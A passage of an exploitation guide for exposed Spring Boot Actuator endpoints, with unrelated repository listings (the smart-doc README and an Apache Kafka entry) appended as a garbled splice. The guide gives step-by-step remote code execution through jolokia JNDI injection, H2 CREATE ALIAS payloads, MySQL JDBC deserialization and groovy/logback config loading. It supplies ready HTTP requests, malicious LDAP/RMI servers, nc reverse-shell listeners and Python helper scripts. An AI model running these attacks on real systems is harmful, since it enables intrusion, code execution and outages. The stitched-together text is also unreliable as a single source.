A [python script example](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-xstream-rce.py) that depends on Flask and meets the requirements is provided; it uses the python interpreter that ships with the target Linux machine to spawn a reverse shell. (A stdlib-only sketch of the same idea follows at the end of this section.)

Run the script on a server you control, adjusting the reverse-shell IP address and port in the script as needed.

##### Step 2: listen for the reverse shell

Usually with nc:

```bash
nc -lvp 443
```

##### Step 3: set the eureka.client.serviceUrl.defaultZone property

spring 1.x

```
POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://your-vps-ip/example
```

spring 2.x

```
POST /actuator/env
Content-Type: application/json

{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/example"}
```

##### Step 4: refresh the configuration

spring 1.x

```
POST /refresh
Content-Type: application/x-www-form-urlencoded
```

spring 2.x

```
POST /actuator/refresh
Content-Type: application/json
```

#### How it works:

1. The eureka.client.serviceUrl.defaultZone property is set to the URL of a malicious external eureka server
2. The refresh makes the target request that remote URL, and the pre-staged fake eureka server responds with a malicious payload
3. The target's dependencies parse the payload, triggering XStream deserialization and yielding RCE

#### Vulnerability analysis:

[Spring Boot Actuator从未授权访问到getshell](https://www.freebuf.com/column/234719.html)

#### Vulnerable environment:

[repository/springboot-eureka-xstream-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-eureka-xstream-rce)

Normal access:

```
http://127.0.0.1:9093/env
```
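The linked Flask script is essentially a web server that answers every request with the XStream gadget under an XML content type, which is what routes the response into XStream on the client. A stdlib-only sketch of that shape, assuming the gadget XML has already been prepared in a local file (the file name is a placeholder; the actual payload must come from the script above or your own gadget):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# assumed local file holding the prepared XStream gadget XML; not generated here
PAYLOAD = open("xstream-payload.xml", "rb").read()

class FakeEureka(BaseHTTPRequestHandler):
    def do_GET(self):
        # eureka-client accepts XML, which hands the body to XStream
        self.send_response(200)
        self.send_header("Content-Type", "application/xml")
        self.end_headers()
        self.wfile.write(PAYLOAD)

HTTPServer(("0.0.0.0", 80), FakeEureka).serve_forever()
```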
### 0x04: jolokia logback JNDI RCE

#### Preconditions:

- The target exposes the `/jolokia` or `/actuator/jolokia` endpoint
- The target uses the `jolokia-core` dependency (exact version requirements unknown) and the relevant MBean is present in the environment
- The target can reach the attacker's HTTP server (outbound requests are possible)
- Plain JNDI injection is constrained by the target's JDK version: jdk < 6u201/7u191/8u182/11.0.1 (LDAP), though this can be bypassed in suitable environments

#### Exploitation:

##### Step 1: check which MBeans exist

Visit the `/jolokia/list` endpoint and look for the keywords `ch.qos.logback.classic.jmx.JMXConfigurator` and `reloadByURL`.

##### Step 2: host the xml file

On a VPS you control, start a simple HTTP server, preferably on a common HTTP port (80, 443):

```bash
# quickly start an http server with python
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
```

Place a file named `example.xml` (the `xml` suffix matters) in the web root:

```xml
<configuration>
  <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/JNDIObject" as="appName" />
</configuration>
```

##### Step 3: prepare the Java code to execute

Use the tuned reverse-shell [Java example code](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java) `JNDIObject.java`, compiled for compatibility with old JDKs:

```bash
javac -source 1.5 -target 1.5 JNDIObject.java
```

Then copy the resulting `JNDIObject.class` file into the web root from **step 2**.

##### Step 4: stand up a malicious ldap service

Download [marshalsec](https://github.com/mbechler/marshalsec) and start the ldap service with:

```bash
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389
```

##### Step 5: listen for the reverse shell

Usually with nc:

```bash
nc -lv 443
```

##### Step 6: load the logging configuration from the external URL

> ⚠️ If the target fetched example.xml and marshalsec also saw a request, but the target never requested JNDIObject.class, the JNDI injection most likely failed because the target's JDK version is too new.

Substitute your actual your-vps-ip address and request this URL to trigger the vulnerability (the `!/` escaping is sketched at the end of this section):

```
/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/example.xml
```

#### How it works:

1. Requesting the trigger URL amounts to invoking the `reloadByURL` method of the `ch.qos.logback.classic.jmx.JMXConfigurator` class via jolokia
2. The target fetches the logging configuration from the external URL and obtains the malicious xml content
3. The target parses the xml with saxParser.parse (this is also where an XXE vulnerability arises)
4. The xml uses the `insertFromJNDI` tag of the `logback` dependency to point at an external JNDI server
5. The target contacts the malicious JNDI server, resulting in JNDI injection and RCE

#### Vulnerability analysis:

[spring boot actuator rce via jolokia](https://xz.aliyun.com/t/4258)

#### Vulnerable environment:

[repository/springboot-jolokia-logback-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce)

Normal access:

```
http://127.0.0.1:9094/env
```
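The odd-looking `!/` runs in the trigger URL are jolokia's escaping for `/` inside a GET path argument; a small sketch that builds the trigger path from any hosted config URL:

```python
# jolokia GET path arguments escape "/" as "!/"
config_url = "http://your-vps-ip/example.xml"  # the file hosted in step 2
escaped = config_url.replace("/", "!/")
trigger = ("/jolokia/exec/ch.qos.logback.classic:Name=default,"
           "Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/" + escaped)
print(trigger)  # matches the URL shown in step 6
```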
### 0x05: jolokia Realm JNDI RCE

#### Preconditions:

- The target exposes the `/jolokia` or `/actuator/jolokia` endpoint
- The target uses the `jolokia-core` dependency (exact version requirements unknown) and the relevant MBean is present in the environment
- The target can reach the attacker's server (outbound requests are possible)
- Plain JNDI injection is constrained by the target's JDK version: jdk < 6u141/7u131/8u121 (RMI), though this can be bypassed in suitable environments

#### Exploitation:

##### Step 1: check which MBeans exist

Visit the `/jolokia/list` endpoint and look for the keywords `type=MBeanFactory` and `createJNDIRealm` (a keyword-check sketch follows at the end of this section).

##### Step 2: prepare the Java code to execute

Use the tuned reverse-shell [Java example code](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java) `JNDIObject.java`.

##### Step 3: host the class file

On a VPS you control, start a simple HTTP server, preferably on a common HTTP port (80, 443):

```bash
# quickly start an http server with python
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
```

Copy the class file compiled in **step 2** into the HTTP server's web root.

##### Step 4: stand up a malicious rmi service

Download [marshalsec](https://github.com/mbechler/marshalsec) and start the rmi service with:

```bash
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://your-vps-ip:80/#JNDIObject 1389
```

##### Step 5: listen for the reverse shell

Usually with nc:

```bash
nc -lvp 443
```

##### Step 6: send the malicious payload

Adjust the target address, RMI address, port, and other details in [springboot-realm-jndi-rce.py](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py) to your situation, then run it on a server you control.

#### How it works:

1. jolokia is used to invoke createJNDIRealm and create a JNDIRealm
2. The connectionURL attribute is set to the RMI service URL
3. The contextFactory is set to RegistryContextFactory
4. The Realm is stopped
5. The Realm is started, triggering JNDI injection against the specified RMI address and yielding RCE

#### Vulnerability analysis:

[Yet Another Way to Exploit Spring Boot Actuators via Jolokia](https://static.anquanke.com/download/b/security-geek-2019-q1/article-10.html)

#### Vulnerable environment:

[repository/springboot-jolokia-logback-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce)

Normal access:

```
http://127.0.0.1:9094/env
```
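Step 1 of this technique (and of 0x04 above) is just a keyword search over the `/jolokia/list` output; a hedged sketch against the demo environment:

```python
import requests

base = "http://127.0.0.1:9094"  # demo environment from above; adjust to the target
listing = requests.get(base + "/jolokia/list").text
for keyword in ("type=MBeanFactory", "createJNDIRealm",
                "ch.qos.logback.classic.jmx.JMXConfigurator", "reloadByURL"):
    print(keyword, "present:", keyword in listing)
```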
### 0x06: restart h2 database query RCE

#### Preconditions:

- Properties can be set via POST to the target's `/env` endpoint
- The application can be restarted via POST to the target's `/restart` endpoint
- The `com.h2database.h2` dependency is present (exact version requirements unknown)

#### Exploitation:

##### Step 1: set the spring.datasource.hikari.connection-test-query property

> ⚠️ The 'T5' alias in the payload below must be renamed (e.g. to T6) after every command execution before it can be re-created and used again; otherwise the vulnerability will not trigger on the next restart (a payload-generator sketch follows at the end of this section)

spring 1.x (executes the command without echoing output)

```
POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');
```

spring 2.x (executes the command without echoing output)

```
POST /actuator/env
Content-Type: application/json

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');"}
```

##### Step 2: restart the application

spring 1.x

```
POST /restart
Content-Type: application/x-www-form-urlencoded
```

spring 2.x

```
POST /actuator/restart
Content-Type: application/json
```

#### How it works:

1. The spring.datasource.hikari.connection-test-query property is set to a malicious `CREATE ALIAS` SQL statement that defines a custom function
2. The property maps to the connectionTestQuery setting of the HikariCP connection pool, i.e. the SQL statement executed before each new database connection
3. Restarting the application establishes new database connections
4. If the custom function in the SQL statement has not been executed before, it now runs, yielding RCE

#### Vulnerability analysis:

[remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database)

#### Vulnerable environment:

[repository/springboot-h2-database-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-h2-database-rce)

Normal access:

```
http://127.0.0.1:9096/actuator/env
```
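Since the alias needs a fresh name on every run (see the warning in step 1), generating the payload is less error-prone than hand-editing it; a hedged sketch that emits the same statement as above with a random alias:

```python
import random
import string

# fresh alias name each run, per the warning above (T5 -> TXXXX)
alias = "T" + "".join(random.choices(string.ascii_uppercase, k=4))
payload = (
    "CREATE ALIAS {a} AS CONCAT('void ex(String m1,String m2,String m3)"
    "throws Exception{{Runti','me.getRun','time().exe',"
    "'c(new String[]{{m1,m2,m3}});}}');CALL {a}('cmd','/c','calc');"
).format(a=alias)
print(payload)
```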
### 0x07: h2 database console JNDI RCE

#### Preconditions:

- The `com.h2database.h2` dependency is present (exact version requirements unknown)
- The h2 console is enabled in the spring configuration: `spring.h2.console.enabled=true`
- The target can reach the attacker's server (outbound requests are possible)
- JNDI injection is constrained by the target's JDK version: jdk < 6u201/7u191/8u182/11.0.1 (LDAP method)

#### Exploitation:

##### Step 1: request the console route to obtain a jsessionid

Visit the default h2 console route `/h2-console`; the target redirects to `/h2-console/login.jsp?jsessionid=xxxxxx`. Note down the actual `jsessionid=xxxxxx` value.

##### Step 2: prepare the Java code to execute

Use the tuned reverse-shell [Java example code](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java) `JNDIObject.java`, compiled for compatibility with old JDKs:

```bash
javac -source 1.5 -target 1.5 JNDIObject.java
```

##### Step 3: host the class file

On a VPS you control, start a simple HTTP server, preferably on a common HTTP port (80, 443):

```bash
# quickly start an http server with python
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
```

Copy the `JNDIObject.class` file compiled in **step 2** into the HTTP server's web root.

##### Step 4: stand up a malicious ldap service

Download [marshalsec](https://github.com/mbechler/marshalsec) and start the ldap service with:

```bash
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389
```

##### Step 5: listen for the reverse shell

Usually with nc:

```bash
nc -lv 443
```

##### Step 6: send the request that triggers the JNDI injection

Replace `jsessionid=xxxxxx`, `www.example.com`, and `ldap://your-vps-ip:1389/JNDIObject` in the request below as appropriate:

```
POST /h2-console/login.do?jsessionid=xxxxxx
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.example.com/h2-console/login.jsp?jsessionid=xxxxxx

language=en&setting=Generic+H2+%28Embedded%29&name=Generic+H2+%28Embedded%29&driver=javax.naming.InitialContext&url=ldap://your-vps-ip:1389/JNDIObject&user=&password=
```

#### Vulnerability analysis:

[Spring Boot + H2数据库JNDI注入](https://mp.weixin.qq.com/s/Yn5U8WHGJZbTJsxwUU3UiQ)

#### Vulnerable environment:

[repository/springboot-h2-database-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-h2-database-rce)

Normal access:

```
http://127.0.0.1:9096/h2-console
```

### 0x08: mysql jdbc deserialization RCE

#### Preconditions:

- Properties can be set via POST to the target's `/env` endpoint
- The configuration can be reloaded via POST to the target's `/refresh` endpoint (the `spring-boot-starter-actuator` dependency is present)
- The `mysql-connector-java` dependency is present in the target environment
- The target can reach the attacker's server (outbound requests are possible)

#### Exploitation:

##### Step 1: inspect the environment's dependencies

Send a GET request to `/env` or `/actuator/env` and search the environment (classpath) for the `mysql-connector-java` keyword, noting its version (5.x or 8.x);

also check the environment for common deserialization gadget dependencies such as `commons-collections`, `Jdk7u21`, `Jdk8u20`, and so on;

then search for the `spring.datasource.url` keyword and note its `value` so the normal jdbc url can be restored afterwards.

##### Step 2: stand up a malicious rogue mysql server

On a server you control, run the [springboot-jdbc-deserialization-rce.py](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-jdbc-deserialization-rce.py) script, and use [ysoserial](https://github.com/frohoff/ysoserial) to customize the command to execute:

```bash
java -jar ysoserial.jar CommonsCollections3 calc > payload.ser
```

This generates the `payload.ser` deserialization payload file **in the same directory** as the script, for the script to use.

##### Step 3: set the spring.datasource.url property

> ⚠️ Changing this property temporarily breaks all of the site's normal database services and will affect the business. Proceed with caution!

For mysql-connector-java 5.x, set the **property value** to:

```
jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true
```

For mysql-connector-java 8.x, set the **property value** to:

```
jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true
```

spring 1.x

```
POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.url=the property value above
```

spring 2.x

```
POST /actuator/env
Content-Type: application/json

{"name":"spring.datasource.url","value":"the property value above"}
```

##### Step 4: refresh the configuration

spring 1.x

```
POST /refresh
Content-Type: application/x-www-form-urlencoded
```

spring 2.x

```
POST /actuator/refresh
Content-Type: application/json
```

##### Step 5: trigger a database query

Try hitting a known database-backed endpoint on the site, such as `/product/list`, or find some other way to make the site perform a database query; the query triggers the vulnerability.

##### Step 6: restore the normal jdbc url

After the deserialization has been exploited, use the method from **step 3** to restore `spring.datasource.url` to the original `value` recorded in **step 1**.

#### How it works:

1. The spring.datasource.url property is set to the URL of an external malicious mysql jdbc server
2. After the refresh, the new spring.datasource.url property value takes effect
3. When the site performs a database query or similar operation, it tries to establish a new database connection using the malicious mysql jdbc url
4. The malicious mysql server then returns deserialization payload data at the appropriate stage of connection setup
5. The target's mysql-connector-java deserializes the staged gadget, yielding RCE

#### Vulnerability analysis:

[New-Exploit-Technique-In-Java-Deserialization-Attack](https://i.blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf)

#### Vulnerable environment:

> spring.datasource.url, spring.datasource.username, and spring.datasource.password in application.properties must be configured so that the mysql database is reachable; otherwise the application exits with an error on startup

[repository/springboot-mysql-jdbc-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce)

Normal access:

```
http://127.0.0.1:9097/actuator/env
```

Trigger the vulnerability after sending the payload:

```
http://127.0.0.1:9097/product/list
```

### 0x09: restart logging.config logback JNDI RCE

#### Preconditions:

- Properties can be set via POST to the target's `/env` endpoint
- The application can be restarted via POST to the target's `/restart` endpoint
- Plain JNDI injection is constrained by the target's JDK version: jdk < 6u201/7u191/8u182/11.0.1 (LDAP), though this can be bypassed in suitable environments
- ⚠️ The target must be able to reach the attacker's HTTP server (outbound requests are possible); otherwise the restart crashes the application
- ⚠️ If the HTTP server returns a file containing malformed xml syntax, the application crashes
- ⚠️ The object returned by the JNDI service must implement the `javax.naming.spi.ObjectFactory` interface; otherwise the application crashes

#### Exploitation:

##### Step 1: host the xml file

On a VPS you control, start a simple HTTP server, preferably on a common HTTP port (80, 443):

```bash
# quickly start an http server with python
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
```

Place a file named `example.xml` (the `xml` suffix matters) in the web root; its actual content depends on the JNDI service used in step 2:

```xml
<configuration>
  <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/TomcatBypass/Command/Base64/b3BlbiAtYSBDYWxjdWxhdG9y" as="appName" />
</configuration>
```

##### Step 2: host the malicious ldap service and code

Following [this article](https://landgrey.me/blog/21/), modify [JNDIExploit](https://github.com/feihong-cs/JNDIExploit) and start it (other approaches work too):

```bash
java -jar JNDIExploit-1.0-SNAPSHOT.jar -i your-vps-ip
```

##### Step 3: set the logging.config property

spring 1.x

```
POST /env
Content-Type: application/x-www-form-urlencoded

logging.config=http://your-vps-ip/example.xml
```

spring 2.x

```
POST /actuator/env
Content-Type: application/json

{"name":"logging.config","value":"http://your-vps-ip/example.xml"}
```

##### Step 4: restart the application

spring 1.x

```
POST /restart
Content-Type: application/x-www-form-urlencoded
```

spring 2.x

```
POST /actuator/restart
Content-Type: application/json
```

#### How it works:

1. The logging.config property points the target at an external logback configuration file URL
2. After the restart, the application fetches that URL and obtains the malicious xml content
3. The target parses the xml with saxParser.parse (this is also where an XXE vulnerability arises)
4. The xml uses the `insertFromJNDI` tag of the `logback` dependency to point at an external JNDI server
5. The target contacts the malicious JNDI server, resulting in JNDI injection and RCE

#### Vulnerability analysis:

[spring boot actuator rce via jolokia](https://xz.aliyun.com/t/4258)

https://landgrey.me/blog/21/

#### Vulnerable environment:

[repository/springboot-restart-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce)

Normal access:

```
http://127.0.0.1:9098/actuator/env
```

### 0x0A: restart logging.config groovy RCE

#### Preconditions:

- Properties can be set via POST to the target's `/env` endpoint
- The application can be restarted via POST to the target's `/restart` endpoint
- ⚠️ The target must be able to reach the attacker's HTTP server (outbound requests are possible); otherwise the restart crashes the application
- ⚠️ If the HTTP server returns a file containing malformed groovy syntax, the application crashes
- ⚠️ The groovy dependency must be present in the environment; otherwise the application crashes

#### Exploitation:

##### Step 1: host the groovy file

On a VPS you control, start a simple HTTP server, preferably on a common HTTP port (80, 443):

```bash
# quickly start an http server with python
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
```

Place a file named `example.groovy` (the `groovy` suffix matters) in the web root, containing the groovy code to execute, for example:

```groovy
Runtime.getRuntime().exec("open -a Calculator")
```

##### Step 2: set the logging.config property

spring 1.x

```
POST /env
Content-Type: application/x-www-form-urlencoded

logging.config=http://your-vps-ip/example.groovy
```

spring 2.x

```
POST /actuator/env
Content-Type: application/json

{"name":"logging.config","value":"http://your-vps-ip/example.groovy"}
```

##### Step 3: restart the application

spring 1.x

```
POST /restart
Content-Type: application/x-www-form-urlencoded
```

spring 2.x

```
POST /actuator/restart
Content-Type: application/json
```

#### How it works:

1. The logging.config property points the target at an external logback configuration file URL
2. After the restart, the application requests the configured URL
3. The logic in the `ch.qos.logback.classic.util.ContextInitializer.java` code of the `logback-classic` component checks whether the url ends with `groovy`
4. If it does, the groovy code in the file content is eventually executed, yielding RCE

#### Vulnerable environment:

[repository/springboot-restart-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce)

Normal access:

```
http://127.0.0.1:9098/actuator/env
```

### 0x0B: restart spring.main.sources groovy RCE

#### Preconditions:

- Properties can be set via POST to the target's `/env` endpoint
- The application can be restarted via POST to the target's `/restart` endpoint
- ⚠️ The target must be able to reach the attacker's HTTP server (outbound requests are possible); otherwise the restart crashes the application
- ⚠️ If the HTTP server returns a file containing malformed groovy syntax, the application crashes
- ⚠️ The groovy dependency must be present in the environment; otherwise the application crashes

#### Exploitation:

##### Step 1: host the groovy file

On a VPS you control, start a simple HTTP server, preferably on a common HTTP port (80, 443):

```bash
# quickly start an http server with python
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
```

Place a file named `example.groovy` (the `groovy` suffix matters) in the web root, containing the groovy code to execute, for example:

```groovy
Runtime.getRuntime().exec("open -a Calculator")
```

##### Step 2: set the spring.main.sources property

spring 1.x

```
POST /env
Content-Type: application/x-www-form-urlencoded

spring.main.sources=http://your-vps-ip/example.groovy
```

spring 2.x

```
POST /actuator/env
Content-Type: application/json

{"name":"spring.main.sources","value":"http://your-vps-ip/example.groovy"}
```

##### Step 3: restart the application

spring 1.x

```
POST /restart
Content-Type: application/x-www-form-urlencoded
```

spring 2.x

```
POST /actuator/restart
Content-Type: application/json
```

#### How it works:

1. The spring.main.sources property lets the target set the URL of an additional source used to create the ApplicationContext
2. After the restart, the application requests the configured URL
3. The logic in the `org.springframework.boot.BeanDefinitionLoader.java` code of the `spring-boot` component checks whether the url ends with `.groovy`
4. If it does, the groovy code in the file content is eventually executed, yielding RCE

#### Vulnerable environment:

[repository/springboot-restart-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce)

Normal access:

```
http://127.0.0.1:9098/actuator/env
```

### 0x0C: restart spring.datasource.data h2 database RCE

#### Preconditions:

- Properties can be set via POST to the target's `/env` endpoint
- The application can be restarted via POST to the target's `/restart` endpoint
- The `h2database` and `spring-boot-starter-data-jpa` dependencies are present in the environment
- ⚠️ The target must be able to reach the attacker's HTTP server (outbound requests are possible); otherwise the restart crashes the application
- ⚠️ If the HTTP server returns a file containing malformed h2 sql syntax, the application crashes

#### Exploitation:

##### Step 1: host the sql file

On a VPS you control, start a simple HTTP server, preferably on a common HTTP port (80, 443):

```bash
# quickly start an http server with python
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
```

Place a file with any name in the web root, containing the h2 sql code to execute, for example:

> ⚠️ The 'T5' function in the payload below can only be executed by one restart; subsequent restarts need a new function name (e.g. T6) and a new sql URL before the restart can be reused, otherwise the second restart crashes the application

```sql
CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('/bin/bash','-c','open -a Calculator');
```

##### Step 2: set the spring.datasource.data property

spring 1.x

```
POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.data=http://your-vps-ip/example.sql
```

spring 2.x

```
POST /actuator/env
Content-Type: application/json

{"name":"spring.datasource.data","value":"http://your-vps-ip/example.sql"}
```

##### Step 3: restart the application

spring 1.x

```
POST /restart
Content-Type: application/x-www-form-urlencoded
```

spring 2.x

```
POST /actuator/restart
Content-Type: application/json
```

#### How it works:

1. The spring.datasource.data property lets the target set the URL of a jdbc DML sql file
2. After the restart, the application requests the configured URL
3. The logic in the `org.springframework.boot.autoconfigure.jdbc.DataSourceInitializer.java` code of the `spring-boot-autoconfigure` component uses the `runScripts` method to execute the h2 database sql code fetched from the URL, yielding RCE

#### Vulnerable environment:

[repository/springboot-restart-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce)

Normal access:

```
http://127.0.0.1:9098/actuator/env
```
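The four restart-based techniques above (0x09 through 0x0C) all share the same set-property-then-restart shape; a hedged variant of the earlier refresh helper (base URL, property name, and value are per-technique):

```python
import requests

def set_property_and_restart(base, name, value, spring2=True):
    """Set an actuator-exposed property, then restart so it takes effect."""
    if spring2:
        requests.post(base + "/actuator/env", json={"name": name, "value": value})
        requests.post(base + "/actuator/restart", json={})
    else:
        requests.post(base + "/env", data={name: value})
        requests.post(base + "/restart", data={})
```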
0
TongchengOpenSource/smart-doc
Smart-doc is a Java RESTful API documentation generation tool. It generates interface documentation based on interface source-code analysis, with completely zero code intrusion.
null
<h1 align="center">Smart-Doc Project</h1> ![maven](https://img.shields.io/maven-central/v/com.ly.smart-doc/smart-doc) [![License](https://img.shields.io/badge/license-Apache%202-green.svg)](https://www.apache.org/licenses/LICENSE-2.0) ![number of issues closed](https://img.shields.io/github/issues-closed-raw/smart-doc-group/smart-doc) ![closed pull requests](https://img.shields.io/github/issues-pr-closed/smart-doc-group/smart-doc) ![java version](https://img.shields.io/badge/JAVA-1.8+-green.svg) [![chinese](https://img.shields.io/badge/chinese-中文文档-brightgreen)](https://smart-doc-group.github.io/#/zh-cn/) ![gitee star](https://gitee.com/smart-doc-team/smart-doc/badge/star.svg) ![git star](https://img.shields.io/github/stars/smart-doc-group/smart-doc.svg) ## Introduce `smart-doc[smɑːt dɒk]`is a tool that supports both `JAVA REST API` and `JAVA WebSocket` and `Apache Dubbo RPC` interface document generation. `Smart-doc` is based on interface source code analysis to generate interface documents, and zero annotation intrusion. You only need to write Javadoc comments when developing, `smart-doc` can help you generate `Markdown` or `HTML5` document. `smart-doc` does not need to inject annotations into the code like `Swagger`. [quick start](https://smart-doc-group.github.io/#/) ## Documentation * [English](https://smart-doc-group.github.io/#/) * [中文](https://smart-doc-group.github.io/#/zh-cn/) ## Features - Zero annotation, zero learning cost, only need to write standard `JAVA` document comments. - Automatic derivation based on source code interface definition, powerful return structure derivation support. - Support `Spring MVC`, `Spring Boot`, `Spring Boot Web Flux` (Not support endpoint), `Feign`,`JAX-RS`. - Supports the derivation of asynchronous interface returns such as `Callable`, `Future`, `CompletableFuture`. - Support `JSR-303`parameter verification specification. - Support for automatic generation of request examples based on request parameters. - Support for generating `JSON` return value examples. - Support for loading source code from outside the project to generate field comments (including the sources jar package). - Support for generating multiple formats of documents: `Markdown`,`HTML5`,`Word`,`Asciidoctor`,`Postman Collection 2.0+`,`OpenAPI 3.0`. - Support the generation of `Jmeter` performance testing scripts - Support for exporting error codes and data dictionary codes to API documentation. - The debug html5 page fully supports file upload and download testing. - Support `Apache Dubbo RPC`. ## Best Practice `smart-doc` + [Torna](http://torna.cn) form an industry-leading document generation and management solution, using `smart-doc` to complete Java source code analysis and extract annotations to generate API documents without intrusion, and automatically push the documents to the `Torna` enterprise-level interface document management platform. ![smart-doc+torna](https://raw.githubusercontent.com/shalousun/smart-doc/master/images/smart-doc-torna-en.png) ## Building You could build with the following commands. (`JDK 1.8` is required to build the master branch) ``` mvn clean install -Dmaven.test.skip=true ``` ## TODO - GRPC ## Who is using These are only part of the companies using `smart-doc`, for reference only. If you are using smart-doc, please [add your company here](https://github.com/smart-doc-group/smart-doc/issues/12) to tell us your scenario to make `smart-doc` better. 
![IFLYTEK](https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/iflytek.png) &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/oneplus.png" title="一加" > &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/xiaomi.png" title="小米" > &nbsp;&nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/shunfeng.png" title="顺丰"> &nbsp;&nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/ly.jpeg" title="同程旅行" width="160px" height="70px"/> &nbsp;&nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/kuishou.png" title="快手"> &nbsp;&nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/mafengwo.png" title="马蜂窝"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/yunda.png" title="韵达速递" width="192px" height="64px"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/zhongtongzhiyun.png" title="中通智运"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/tcsklogo.jpeg" title="同程数科" width="170px" height="64px"/> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/flipboard.png" title="红板报"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/dianxin.png" title="中国电信"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/yidong.png" title="中国移动"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/neusoft.png" title="东软集团"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/zhongkezhilian.png" title="中科智链" width="240px" height="64px"/> &nbsp;&nbsp;<img src="https://www.hand-china.com/static/img/hand-logo.svg" title="上海汉得信息技术股份有限公司" width="240px" height="64px"/> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/yuanmengjiankang.png" title="远盟健康" width="230px" height="64px"/> ## Acknowledgements Thanks to [JetBrains SoftWare](https://www.jetbrains.com) for providing free Open Source license for this project. <img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/jetbrains-variant-3.png" width="260px" height="220px"/> ## License `Smart-doc` is under the Apache 2.0 license. See the [LICENSE](https://github.com/smart-doc-group/smart-doc/blob/master/LICENSE) file for details. ## Contact Email: opensource@ly.com
0
apache/kafka
Mirror of Apache Kafka
kafka scala
